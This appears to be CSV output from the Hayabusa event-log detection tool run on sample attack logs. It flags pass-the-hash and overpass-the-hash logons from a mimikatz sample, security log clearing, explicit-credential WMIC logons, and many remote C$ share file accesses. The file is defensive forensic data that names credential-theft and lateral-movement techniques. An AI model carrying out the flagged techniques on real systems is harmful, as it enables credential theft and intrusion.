2019-03-18 20:06:29.911 +09:00,PC01.example.corp,4624,informational,Logon Type 9 - NewCredentials,User: user01  :  Workstation:   :  IP Address: ::1  :  Port: 0  :  LogonID: 0x4530f0f  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx
2019-03-18 20:06:29.911 +09:00,PC01.example.corp,4672,informational,Admin Logon,User: user01  :  LogonID: 0x4530f0f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx
2019-03-18 20:06:29.911 +09:00,PC01.example.corp,4624,medium,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx
2019-03-18 20:06:29.911 +09:00,PC01.example.corp,4624,high,Successful Overpass the Hash Attempt,,rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx
2019-03-18 20:27:00.438 +09:00,PC01.example.corp,1102,high,Security log was cleared,User: user01,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx
2019-03-18 20:27:23.231 +09:00,PC01.example.corp,4648,informational,Explicit Logon,Source User: user01  :  Target User: administrator  :  IP Address: -  :  Process: C:\Windows\System32\svchost.exe  :  Target Server: RPCSS/WIN-77LTAPHIQ1R.example.corp,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx
2019-03-18 20:27:23.261 +09:00,PC01.example.corp,4648,medium,Explicit Logon: Suspicious Process,Source User: user01  :  Target User: administrator  :  IP Address: -  :  Process: C:\Windows\System32\wbem\WMIC.exe  :  Target Server: host/WIN-77LTAPHIQ1R.example.corp,rules/hayabusa/default/alerts/Security/4648_ExplicitLogonSuspiciousProcess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx
2019-03-18 20:27:23.261 +09:00,PC01.example.corp,4648,medium,Suspicious Remote Logon with Explicit Credentials,,rules/sigma/builtin/security/win_susp_logon_explicit_credentials.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx
2019-03-18 20:27:23.271 +09:00,PC01.example.corp,4648,medium,Explicit Logon: Suspicious Process,Source User: user01  :  Target User: administrator  :  IP Address: -  :  Process: C:\Windows\System32\wbem\WMIC.exe  :  Target Server: WIN-77LTAPHIQ1R.example.corp,rules/hayabusa/default/alerts/Security/4648_ExplicitLogonSuspiciousProcess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx
2019-03-18 20:27:23.271 +09:00,PC01.example.corp,4648,medium,Suspicious Remote Logon with Explicit Credentials,,rules/sigma/builtin/security/win_susp_logon_explicit_credentials.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx
2019-03-18 23:23:22.264 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:22.284 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Program Files\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:22.284 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.356 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: BGinfo  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.546 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.546 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Public\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.556 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\account$  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.556 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\account$\Contacts\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.556 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\account$\Desktop\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.556 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\account$\Documents\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\account$\Downloads\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\account$\Favorites\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\account$\Links\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\account$\Music\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\account$\Pictures\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.576 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\account$\Saved Games\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.576 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\account$\Searches\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.576 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\account$\Videos\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.576 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\account$\Contacts  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\account$\Desktop  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\account$\Documents  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\account$\Downloads  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\account$\Favorites  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\account$\Favorites\Links\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\account$\Favorites\Links for United States\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\account$\Favorites\Links  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\account$\Favorites\Links for United States  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\account$\Links  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\account$\Music  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\account$\Pictures  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\account$\Saved Games  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\account$\Searches  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\account$\Videos  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admin01  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admin01\Contacts\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admin01\Desktop\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admin01\Documents\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admin01\Downloads\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admin01\Favorites\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admin01\Links\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.626 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admin01\Music\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.626 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admin01\Pictures\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.626 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admin01\Saved Games\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admin01\Searches\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admin01\Videos\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admin01\Contacts  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admin01\Desktop  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admin01\Documents  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.666 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admin01\Downloads  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.666 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admin01\Favorites  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.666 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admin01\Favorites\Links\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.666 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admin01\Favorites\Links for United States\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admin01\Favorites\Links  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admin01\Favorites\Links for United States  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admin01\Links  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admin01\Music  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admin01\Pictures  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admin01\Saved Games  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admin01\Searches  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admin01\Videos  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator\Contacts\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator\Desktop\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
